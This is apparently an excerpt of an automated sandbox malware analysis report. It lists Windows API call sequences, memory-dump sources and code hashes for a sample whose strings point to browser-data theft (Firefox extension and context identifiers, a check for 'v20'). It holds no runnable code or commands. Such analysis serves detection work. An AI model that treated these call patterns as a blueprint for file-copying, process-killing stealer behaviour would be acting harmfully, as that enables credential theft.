                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                  • ExitProcess.KERNEL32 ref: 00416755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                  • Opcode Fuzzy Hash: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: @Jn@$Jn@$Jn@
                                  • API String ID: 544645111-1180188686
                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpy
                                  • String ID: vI@$vI@
                                  • API String ID: 3905823039-1245421781
                                  • Opcode ID: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                  • Opcode Fuzzy Hash: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                  • wsprintfW.USER32 ref: 00418D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 659108358-2783943728
                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AA548
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 022AA666
                                  • lstrlen.KERNEL32(00000000), ref: 022AA923
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094
                                  • DeleteFileA.KERNEL32(00000000), ref: 022AA9AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                  • Instruction ID: 65fc619d22ac33b741407e94d18353a9fae2cd95dd77ac6b37a7b5994e72ad36
                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                  • Instruction Fuzzy Hash: 8DE1D0729203189BCB16EBE8DD91DEE733ABF25340F508159E156B2198EF346B48CF61
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  • Opcode ID: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                  • Opcode Fuzzy Hash: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AD6E8
                                  • lstrlen.KERNEL32(00000000), ref: 022AD8FF
                                  • lstrlen.KERNEL32(00000000), ref: 022AD913
                                  • DeleteFileA.KERNEL32(00000000), ref: 022AD992
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                  • Instruction ID: 4501ccb8a522ecfbb706d273c1d526c99681ce8df619899a31d86f2e3cd30174
                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                  • Instruction Fuzzy Hash: 019112729203089BCB19FBE8DD95DEE733AAF25340F50416DE116A2198EF346B48CF61
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                  • Opcode Fuzzy Hash: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ADA68
                                  • lstrlen.KERNEL32(00000000), ref: 022ADC06
                                  • lstrlen.KERNEL32(00000000), ref: 022ADC1A
                                  • DeleteFileA.KERNEL32(00000000), ref: 022ADC99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                  • Instruction ID: 96d00b91713f1c0d76f3cbbcc8e21eef1c559ca0443dbd930c084816c7022964
                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                  • Instruction Fuzzy Hash: A88112729203089BCB19FBE8DD94DEE733AAF25340F50456DE116A6198EF346B48CF61
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                  • Opcode Fuzzy Hash: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                  • Opcode Fuzzy Hash: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                  APIs
                                  • memset.MSVCRT ref: 022B9752
                                    • Part of subcall function 022B8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022B9785,00000000), ref: 022B8FC2
                                    • Part of subcall function 022B8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022B8FC9
                                    • Part of subcall function 022B8FB7: wsprintfW.USER32 ref: 022B8FDF
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022B9812
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 022B9830
                                  • CloseHandle.KERNEL32(00000000), ref: 022B983D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                  • Instruction ID: 67857c8d0d6b1298d325360cf64aaf16797c3f12c2b6300967e35de65ae4dcf8
                                  • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                  • Instruction Fuzzy Hash: C23117B5A10248AFDF14DFE0CC48BEDB7B9EF45340F508459E606AA288DB786A84CF51
                                  APIs
                                  • memset.MSVCRT ref: 004194EB
                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 396451647-0
                                  • Opcode ID: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
                                  • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                  • Opcode Fuzzy Hash: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
                                  • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022B8931
                                  • Process32First.KERNEL32(?,00000128), ref: 022B8945
                                  • Process32Next.KERNEL32(?,00000128), ref: 022B895A
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • CloseHandle.KERNEL32(?), ref: 022B89C8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
